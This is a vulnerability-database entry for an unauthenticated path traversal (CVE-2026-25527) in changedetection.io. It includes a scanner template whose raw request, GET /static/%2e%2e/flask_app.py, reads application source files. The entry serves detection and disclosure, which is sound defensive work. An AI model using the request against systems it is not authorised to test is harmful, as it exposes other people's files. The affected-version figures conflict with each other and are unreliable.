/Vulnerability Library

changedetection.io <= 0.52.9 - Unauthenticated Path Traversal

CVE-2026-25527
Verified

Description

changedetection.io <= 0.53.9 contains a path traversal caused by improper validation of the 'group' parameter in /static/<group>/<filename> route, letting unauthenticated attackers read local application source files.

Severity

Medium

CVSS Score

5.3

Exploit Probability

1%

Affected Product

changedetection.io

Published Date

June 5, 2026

Template Author

wrg-11

CVE-2026-25527.yaml
id: CVE-2026-25527

info:
  name: changedetection.io <= 0.52.9 - Unauthenticated Path Traversal
  author: WRG-11
  severity: medium
  description: |
    changedetection.io <= 0.53.9 contains a path traversal caused by improper validation of the 'group' parameter in /static/<group>/<filename> route, letting unauthenticated attackers read local application source files.
  impact: |
    Unauthenticated attackers can read local application source files, potentially exposing sensitive information.
  remediation: |
   Upgrade to version 0.53.2 or later.
  reference:
    - https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-9jj8-v89v-xjvw
    - https://nvd.nist.gov/vuln/detail/CVE-2026-25527
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2026-25527
    epss-score: 0.0092
    epss-percentile: 0.57095
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 1
    vendor: dgtlmoon
    product: changedetection.io
    shodan-query: http.html:"changedetection.io"
  tags: cve,cve2026,changedetection,lfi,traversal,unauth,exposure

http:
  - raw:
      - |
        GET /static/%2e%2e/flask_app.py HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "from changedetectionio", "def static_content(")'
          - 'contains(content_type, "text/x-python")'
        condition: and
# digest: 4b0a00483046022100f380b6536465fe25c4950a4aba557cf4d0dc6edc619e7e9ae2dae0c7e26740080221009623f1a2a538419244ab960df928bbbd49f9e17d8fd667badf3ee8ffc404e79b:922c64590222798bb761d5b6d8e72950
5.3Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
CVE ID:
cve-2026-25527
CWE ID:
cwe-22

References

https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-9jj8-v89v-xjvwhttps://nvd.nist.gov/vuln/detail/CVE-2026-25527

Remediation Steps

Upgrade to version 0.53.2 or later.